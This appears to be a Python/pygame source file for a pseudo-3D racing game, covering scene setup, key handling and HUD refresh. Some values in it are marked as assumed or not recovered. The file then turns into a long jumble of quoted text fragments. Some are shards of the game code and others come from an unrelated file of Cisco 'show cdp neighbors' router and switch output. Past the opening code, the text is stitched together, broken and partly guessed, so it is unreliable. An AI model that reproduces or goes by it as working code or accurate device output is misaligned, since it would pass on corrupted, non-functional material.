        self.bg_trees2.rect.top = 0
        self.bg_trees2.rect.left = self.bg_trees1.rect.width
        self.disp_add(self.bg_trees2)
        self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT'])
        #self.car.scale(self.road.cameraDepth / self.road.playerZ)
        self.car.scale(2)
        self.car.rect.top = 400
        self.car.rect.left = (640 - self.car.rect.width) // 2
        ##self.disp_add(self.car)  # car disp add after road
        self.road = FPSptRoadB((640, 240), self.cfg, car=self.car,
                               bg_sky=[self.bg_sky1, self.bg_sky2],
                               bg_hills=[self.bg_hills1, self.bg_hills2],
                               bg_trees=[self.bg_trees1, self.bg_trees2])
        self.road.rect.top = 240
        self.road.rect.left = 0
        self.disp_add(self.road)
        self.disp_add(self.car)
        self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len)
        self.rdmap.rect.top = 0
        self.rdmap.rect.left = 80
        self.rdmap.rotate(90)
        self.disp_add(self.rdmap)
        self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.YELLOW, font_size=16)
        self.rdpsd.rect.top = 60  # (offset assumed; only the 20/40 rows were recovered)
        self.rdpsd.rect.left = 600
        self.disp_add(self.rdpsd)
        self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.YELLOW, font_size=16)
        self.scr.rect.top = 40#454
        self.scr.rect.left = 600
        self.disp_add(self.scr)
        self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16)
        self.tm_once.rect.top = 20#454
        self.tm_once.rect.left = 600
        self.disp_add(self.tm_once)
        self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW)
        self.prog.rect.top = 70#340
        self.prog.rect.left = 610
        #self.prog.rotate(180)
        self.disp_add(self.prog)
        self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN)
        self.spd.rect.top = 70  # (offset assumed; matches self.prog)
        self.spd.rect.left = 602
        #self.spd.rotate(180)
        self.disp_add(self.spd)

    def rdmap_hide(self):
        self.rdmap.hide()

    def rdmap_reset(self):
        self.rdmap.clear()
        self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len)
        self.rdmap.rotate(90)

    def road_reset(self):
        self.road.rd_reset()
        self.rdmap_reset()

    def road_reset_keep_segs(self):
        self.road.rd_reset(init=False, keep_segs=True)

    def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file)
        self.rdmap_reset()

    def road_segs_to_file(self, segs_file=None):
        if not segs_file:
            segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt'
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_seg_json_save(segs_file)

    def handle_event(self, events, *args, **kwargs):
        r_events = []
        for event in events:
            if event.type == self.pglc.KEYUP:
                k = event.key
                if k == self.pglc.K_SPACE:
                    # hide / show road map (toggle details not recovered)
                    self.rdmap_hide()
                elif k == self.pglc.K_TAB:
                    # replay this road
                    self.road_reset_keep_segs()
                elif k == self.pglc.K_RETURN:
                    # go to a new road
                    self.road_reset()
                elif k == self.pglc.K_BACKSLASH:  # (binding assumed)
                    self.road_reset_from_file()
                elif k == self.pglc.K_SLASH:
                    self.road_segs_to_file()
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                r_events.append(event)
            else:
                r_events.append(event)
        return r_events

    def refresh(self, fps_clock, *args, **kwargs):
        self.rdpsd.lbl_set(str(int(self.road.speed)))
        self.scr.lbl_set(str(int(self.road.score)))
        self.tm_once.lbl_set(str(int(self.road.tm_last_once)))
        prg = self.road.position / self.road.track_len
        self.prog.progress(prg)
        self.spd.progress(self.road.speed / self.road.speed_max)  # (assumed)
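
# Illustrative sketch, not part of the original module: rd_seg_get_cleared()
# exists because the live sprite objects stored under 'obj' are not JSON
# serializable. The same round trip with the standard json module instead of
# utils.json_dumps / utils.json_loads:
def _demo_segment_roundtrip():
    import json
    seg = {'index': 0, 'curve': 2.0,
           'sprites': [{'name': 'coin1', 'score': 1, 'obj': object()}]}
    cleared = dict(seg)
    cleared['sprites'] = [dict(spr, obj=None) for spr in seg['sprites']]
    return json.loads(json.dumps(cleared))

#print(_demo_segment_roundtrip())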
self).__init__() self.cfg = cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])", "(self.position % self.seg_len) ''' #x# zw1 = seg['p1']['world']['z'] zw2 =", "rd_seg_render__3_o(self): \"\"\"curve test 2: draw a circle\"\"\" #theta_i = math.pi", "0.0 self.tm_last_once = 0.0 self.sky_speed = 0.1#0.05# self.hill_speed = 0.2#0.1#", "self.xs = 0.0 self.ys = 0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w", "TAB : replay this road * RETURN : go to", "+= p_dt def check_if_car_out_road(self): # decrease score when go out", "self.player_x += 19 if self.player_x > 1000: self.player_di = 3", "w_half) < sprt_at < (car_x + w_half): self.score += scr", "FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg =", "> 1000: self.player_di = 3 #''' #''' self.position += 10.0#5.0#1.0", "40, 'HIGH': 60 }, } FP_ROAD_SPRTS = { 'chest': {'imgs':", "3 in e_keys_up: if self.player_di != 1: self.player_di = 0", "segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs = segs self.rad", "# TODO: check if this seg is looped seg_scale =", "sky.rect.left -= 1#self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left", "def main(): #sf = GMFlatpath('flatpath <:::>', 640, 480) sf =", "{ 'x': 625, 'y': 5, 'w': 360, 'h': 360 },", "a new road TODO: * hill road * more road", "self.seg_len, 'y': yw}, 'camera': {}, 'screen': {}}, 'curve': curve, 'color':", "self.game_over = True self.game_score = -1.0 def check_score(self): # make", "xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\"", "zc1) xs1 = self.xp_to_xs(xp1, self.w) xp2 = self.xc_to_xp(xc2, self.d, zc1)", "self.player_x # <3> #engi = math.pi / 2.0 / self.seg_draw_n", "#+ dx1 #''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4,", "xcr4 = -self.lane_w - self.player_x yc = self.camera_h #print '='", "xc2 = (rad - xx2) - self.player_x xc3 = (rad", "v else: seg_c[k] = [] for spr in seg['sprites']: spr_n", "'SEMI': { 'x': 1365, 'y': 490, 'w': 122, 'h': 144", "}, 'BILLBOARD03': { 'x': 5, 'y': 1262, 'w': 230, 'h':", "[x4, y4-d], [x1, y1-d]] #pnts = [[x1, y1+a], [x2, y2+a],", "0.0) # for hills yw1 = seg['p1']['world'].get('y', 0.0) yw2 =", "xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve", "== self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di is None: di", "= self.base_seg['sprites'] if not sprts: return # NOTE: we now", "is None: #n = seg_n / 20 n = seg_n", "['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs':", "x_i # x_i_saved = x_i obj.rect.top = 116 - y", "/ 2.0 * yp ys = h / 2.0 -", "self.tm_start else: self.tm_start = 0.0 #self.tm_end = 0.0 def update_bg(self):", "seg_scale * 8.0#10.0#2.0 obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)", "xc3 - x_curve - dx_curve xc4 = xc4 - x_curve", "zc2) xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1, ys1,", "'y': 897, 'w': 235, 'h': 118 }, 'BUSH2': { 'x':", "self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self):", "self.pglc.K_f or k == self.pglc.K_j: return 0 elif k ==", "xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve test 2:", "self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file: 
self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf", "pnts.append([x, y]) for seg in segs: curve = seg.get('curve', 0.0)", "0.0 self.sky_speed = 0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed = 0.3#0.15#", "ys1, xsl3, ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2,", "(rad - xx3) - self.player_x xc4 = (rad - xx4)", "[x4, y4+a], [x1, y1+a]] # reflect the y- d =", "ys4, xs3, ys3 print '-' * 30 ''' # grass", "self.xp = 0.0 self.yp = 0.0 self.xs = 0.0 self.ys", "\\ self.player_x > self.road_w / 2: if self.score > 0:", "yc = self.camera_h print '=' * 80 print 'self.position', self.position", "= -1100 #print 'sprt_x', sprt_x #print 'car_x', car_x #print 'car_w',", "== 0: #if n % 4 == 0: c =", "hold, leave, curve, yw=0.0): #print enter, hold, leave, curve, yw", "else: seg_c = {} for k, v in seg.items(): if", "xcr4 = -self.lane_w - self.player_x yc = self.camera_h print '='", "self.seg_len) dx_curve = - (b_curve * b_percent) x_curve = 0", "# TODO: <1> if not obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj']", "trees.rect.width * 2 if trees.rect.left - trees.rect.width > 0: trees.rect.left", "num, 0, height/2.0) self.add_road(num, num, num, 0, 0) def rd_seg_get_cleared(self,", "sprt_at < (car_x + w_half): self.score += scr def check_tm(self):", "cv_s = 0 cv_l = 0.0 else: rad_m = 0.5#1.0#0.1#" ]
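Several shingles in this row outline the renderer's projection chain: xc_to_xp and yc_to_yp map camera-space coordinates onto a projection plane at depth self.d (with a guard for zc == 0.0), and xp_to_xs and yp_to_ys map the result to screen pixels. A minimal sketch of that chain follows; the formulas and the sample numbers are assumptions based on standard pseudo-3D road rendering, since the shingles preserve only the names, the (value, d, zc) signatures and the zero-depth guard.

# Minimal sketch of the flatpath projection helpers. Formulas assumed
# from standard pseudo-3D road rendering, not recovered verbatim.

def xc_to_xp(xc, d, zc):
    # Camera-space x -> projection plane at depth d.
    if zc == 0.0:          # guard seen in the shingles: avoid x / 0
        return xc
    return xc * d / zc

def yc_to_yp(yc, d, zc):
    # Same projection for the vertical axis.
    return yc if zc == 0.0 else yc * d / zc

def xp_to_xs(xp, w):
    # Normalized projected x (-1..1) -> screen x, origin at the left.
    return w / 2.0 + w / 2.0 * xp

def yp_to_ys(yp, h):
    # Screen y grows downward, hence the subtraction.
    return h / 2.0 - h / 2.0 * yp

# Illustrative numbers only: a point half a road-width right of the
# camera and 10 units ahead, camera depth 2, on a 640x480 surface.
xs = xp_to_xs(xc_to_xp(0.5, 2.0, 10.0), 640.0)   # -> 352.0
ys = yp_to_ys(yc_to_yp(-0.3, 2.0, 10.0), 480.0)  # -> 254.4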
[ "881 Fas 1 R4 Fas 0/14 173 R S I", "Device ID Local Intrfce Holdtme Capability Platform Port ID SW1", "- Repeater Device ID Local Intrfce Holdtme Capability Platform Port", "Entry address(es): IP address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router", "- IGMP, r - Repeater, P - Phone Device ID", "address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP", "Repeater Device ID Local Intrfce Holdtme Capability Platform Port ID", "15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010", "Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing port):", "neighbors Capability Codes: R - Router, T - Trans Bridge,", "ID Local Intrfce Holdtme Capability Platform Port ID SW1 Fas", "0/15 144 R S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime :", "173 R S I 881 Fas 1 R5 Fas 0/15", "Device ID: R3 Entry address(es): IP address: 10.1.1.3 Platform: Cisco", "<reponame>laetrid/learning<filename>First_course/test5_base.py #!/usr/bin/env python sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability", "port): FastEthernet0/11 Holdtime : 145 sec Version : Cisco Internetwork", "Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006", "10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port", "(C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright", "FastEthernet0/12 Holdtime : 145 sec Version : Cisco Internetwork Operating", "port): FastEthernet1 Holdtime: 144 sec Version : Cisco IOS Software,", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime", "Platform Port ID SW1 Fas 1 150 S I WS-C2950-", "- Repeater, P - Phone Device ID Local Intrfce Holdtme", "Router, T - Trans Bridge, B - Source Route Bridge", "129 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "-------------------------- Device ID: R1 Entry address(es): IP address: 10.1.1.1 Platform:", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port", "Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4,", "145 sec Version : Cisco Internetwork Operating System Software IOS", "IP address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch IGMP", "VTP Management Domain: '' Native VLAN: 1 Duplex: full Management", "VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show cdp", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port ID", "12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco Systems,", "by Cisco Systems, Inc. Compiled Fri 29-Oct-10 00:02 by prod_rel_team", "ID: R5 Entry address(es): IP address: 10.1.1.5 Platform: Cisco 881,", "123 R S I 881 Fas 1 R3 Fas 0/13", "System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE", "r - Repeater Device ID Local Intrfce Holdtme Capability Platform", "Copyright (c) 1986-2006 by cisco Systems, Inc. 
Compiled Fri 28-Jul-06", "FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime: 144 sec Version", "= ''' SW1> show cdp neighbors detail -------------------------- Device ID:", "VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show cdp", "FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime: 153 sec Version", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/12", "Native VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID:", "detail ------------------------- Device ID: SW1 Entry address(es): IP address: 10.1.1.22", "IP address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch IGMP", ": Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE", "Local Intrfce Holdtme Capability Platform Port ID SW1 Fas 1", "ID (outgoing port): FastEthernet1 Holdtime: 123 sec Version : Cisco", "28-Jul-06 15:16 by weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C,", "cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es): IP", "Fas 0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail", "Bridge S - Switch, H - Host, I - IGMP,", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime :", "IGMP Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime: 144", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime :", "Native VLAN: 1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors =", "H - Host, I - IGMP, r - Repeater Device", "2 VTP Management Domain: '' Native VLAN: 1 Duplex: full", "S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1>", "= ''' SW1>show cdp neighbors Capability Codes: R - Router,", "R5>show cdp neighbors Capability Codes: R - Router, T -", "Holdtime: 129 sec Version : Cisco IOS Software, C880 Software", "(outgoing port): FastEthernet1 Holdtime: 129 sec Version : Cisco IOS", "881 Fas 1 R5 Fas 0/15 144 R S I", "r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability Codes: R -", "R5>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show", "Domain: '' Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors =", "ID (outgoing port): FastEthernet0/13 Holdtime : 145 sec Version :", "R - Router, T - Trans Bridge, B - Source", "(tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright", "00:02 by prod_rel_team advertisement version: 2 VTP Management Domain: ''", "IGMP, r - Repeater, P - Phone Device ID Local", "Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing port):", "R4 Entry address(es): IP address: 10.1.1.4 Platform: Cisco 881, Capabilities:", "R2 Entry address(es): IP address: 10.1.1.2 Platform: Cisco 881, Capabilities:", "''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors detail --------------------------", "R2 Fas 0/12 123 R S I 881 Fas 1", "Fas 1 150 S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail", "Device ID: SW1 Entry address(es): IP address: 10.1.1.22 Platform: cisco", "Systems, Inc. 
Compiled Fri 28-Jul-06 15:16 by weiliu advertisement version:", "Route Bridge S - Switch, H - Host, I -", "Port ID SW1 Fas 1 150 S I WS-C2950- Fas", "FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime : 145 sec", "(outgoing port): FastEthernet0/15 Holdtime : 145 sec Version : Cisco", "1 150 S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail =", "Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport", "port): FastEthernet0/15 Holdtime : 145 sec Version : Cisco Internetwork", "Source Route Bridge S - Switch, H - Host, I", "Intrfce Holdtme Capability Platform Port ID SW1 Fas 1 150", "ID (outgoing port): FastEthernet1 Holdtime: 153 sec Version : Cisco", "FastEthernet1 Holdtime: 153 sec Version : Cisco IOS Software, C880", "r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability Codes: R -", "''' R4>show cdp neighbors Capability Codes: R - Router, T", "port): FastEthernet1 Holdtime: 123 sec Version : Cisco IOS Software,", "Fas 0/12 123 R S I 881 Fas 1 R3", "Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management", "R S I 881 Fas 1 R5 Fas 0/15 144", "Holdtime: 153 sec Version : Cisco IOS Software, C880 Software", "port): FastEthernet1 Holdtime: 153 sec Version : Cisco IOS Software,", "advertisement version: 2 VTP Management Domain: '' Native VLAN: 1", "''' R2>show cdp neighbors Capability Codes: R - Router, T", "Port ID (outgoing port): FastEthernet0/15 Holdtime : 145 sec Version", "''' R4>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "Copyright (c) 1986-2010 by Cisco Systems, Inc. Compiled Fri 29-Oct-10", "''' SW1> show cdp neighbors detail -------------------------- Device ID: R1", "ID (outgoing port): FastEthernet1 Holdtime: 144 sec Version : Cisco", "Holdtime: 144 sec Version : Cisco IOS Software, C880 Software", "Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native", "881 Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp", "Compiled Fri 28-Jul-06 15:16 by weiliu advertisement version: 2 Protocol", "SW1>show cdp neighbors Capability Codes: R - Router, T -", "full ''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability Codes:", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors", "10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14,", "port): FastEthernet1 Holdtime: 129 sec Version : Cisco IOS Software,", "''' R5>show cdp neighbors Capability Codes: R - Router, T", "Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical", "Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime:", "port): FastEthernet0/13 Holdtime : 145 sec Version : Cisco Internetwork", "Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail", "Phone Device ID Local Intrfce Holdtme Capability Platform Port ID", "Port ID (outgoing port): FastEthernet1 Holdtime: 123 sec Version :", "Port ID (outgoing port): FastEthernet1 Holdtime: 173 sec Version :", "Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain:", "''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail ------------------------- Device", "Interface: FastEthernet1, Port ID (outgoing port): 
FastEthernet0/13 Holdtime : 145", "0/12 123 R S I 881 Fas 1 R3 Fas", "Domain: '' Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors =", "FastEthernet0/15 Holdtime : 145 sec Version : Cisco Internetwork Operating", "10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15,", "-------------------------- Device ID: R5 Entry address(es): IP address: 10.1.1.5 Platform:", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime", "Management Domain: '' Native VLAN: 1 Duplex: full Management address(es):", "Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing port):", "r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail ------------------------- Device ID:", "(outgoing port): FastEthernet0/12 Holdtime : 145 sec Version : Cisco", "prod_rel_team advertisement version: 2 VTP Management Domain: '' Native VLAN:", "Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime: 123 sec", "R3>show cdp neighbors Capability Codes: R - Router, T -", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13 Holdtime", "Fas 1 R3 Fas 0/13 129 R S I 881", "ID Local Intrfce Holdtme Capability Platform Port ID R1 Fas", "by prod_rel_team advertisement version: 2 VTP Management Domain: '' Native", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors", "''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability Codes: R", "I - IGMP, r - Repeater, P - Phone Device", "Entry address(es): IP address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router", "FastEthernet1 Holdtime: 129 sec Version : Cisco IOS Software, C880", "Management address(es): -------------------------- Device ID: R3 Entry address(es): IP address:", "Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime: 173 sec", "Switch, H - Host, I - IGMP, r - Repeater", "''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail ------------------------- Device", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime", "- Phone Device ID Local Intrfce Holdtme Capability Platform Port", "C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support:", "address(es): IP address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch", "(outgoing port): FastEthernet1 Holdtime: 123 sec Version : Cisco IOS", "FastEthernet1 Holdtime: 144 sec Version : Cisco IOS Software, C880", "Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show", "Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing port):", "- Trans Bridge, B - Source Route Bridge S -", "1 150 S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail =", "Version : Cisco Internetwork Operating System Software IOS (tm) C2950", "Switch, H - Host, I - IGMP, r - Repeater,", "Holdtime: 123 sec Version : Cisco IOS Software, C880 Software", "= ''' R4>show cdp neighbors detail ------------------------- Device ID: SW1", "FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime : 145 sec", "= ''' R5>show cdp neighbors detail ------------------------- Device ID: SW1", "R4 Fas 0/14 173 R S I 881 Fas 1", "H - Host, I - IGMP, r - Repeater, P", "-------------------------- Device ID: R4 Entry address(es): IP address: 10.1.1.4 Platform:", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/15", "ID (outgoing port): FastEthernet1 Holdtime: 129 sec Version : Cisco", "C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, 
RELEASE SOFTWARE (fc1) Copyright (c)", "full Management address(es): -------------------------- Device ID: R4 Entry address(es): IP", "Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port ID", "R S I 881 Fas 1 R2 Fas 0/12 123", "-------------------------- Device ID: R2 Entry address(es): IP address: 10.1.1.2 Platform:", "sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability Codes: R -", "Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime: 153 sec", "''' R3>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "P - Phone Device ID Local Intrfce Holdtme Capability Platform", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port ID", "(outgoing port): FastEthernet1 Holdtime: 144 sec Version : Cisco IOS", "Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1 Holdtime: 129 sec", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/13", "S I 881 Fas 1 R2 Fas 0/12 123 R", "python sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability Codes: R", "address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "I 881 Fas 1 R2 Fas 0/12 123 R S", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime : 145", "(C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing", "Domain: '' Native VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors =", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11", "Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime: 144 sec", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R5", "Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show", "r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability Codes: R -", "Cisco Internetwork Operating System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M),", "- Host, I - IGMP, r - Repeater, P -", "VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show cdp", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13", "Holdtime : 145 sec Version : Cisco Internetwork Operating System", "Capability Platform Port ID R1 Fas 0/11 153 R S", "Port ID (outgoing port): FastEthernet0/11 Holdtime : 145 sec Version", "SW1 Fas 1 150 S I WS-C2950- Fas 0/14 '''", "SW1 Entry address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities:", "Internetwork Operating System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version", "sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version", "R3 Fas 0/13 129 R S I 881 Fas 1", "address(es): IP address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch", "show cdp neighbors detail -------------------------- Device ID: R1 Entry address(es):", "detail -------------------------- Device ID: R1 Entry address(es): IP address: 10.1.1.1", "value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN: 1 Duplex: full", "881 Fas 1 R2 Fas 0/12 123 R S I", "IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime :", "IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface:", "Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing port): 
FastEthernet1 Holdtime:", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port ID", "Domain: '' Native VLAN: 1 Duplex: full Management address(es): --------------------------", "(fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems,", "R1>show cdp neighbors Capability Codes: R - Router, T -", "S - Switch, H - Host, I - IGMP, r", "sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors detail -------------------------- Device", "version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000", "0/11 153 R S I 881 Fas 1 R2 Fas", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14", "WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port):", "cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16 by weiliu advertisement", "''' R5>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "Fas 1 R4 Fas 0/14 173 R S I 881", "Device ID: R2 Entry address(es): IP address: 10.1.1.2 Platform: Cisco", "1 Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors", "153 sec Version : Cisco 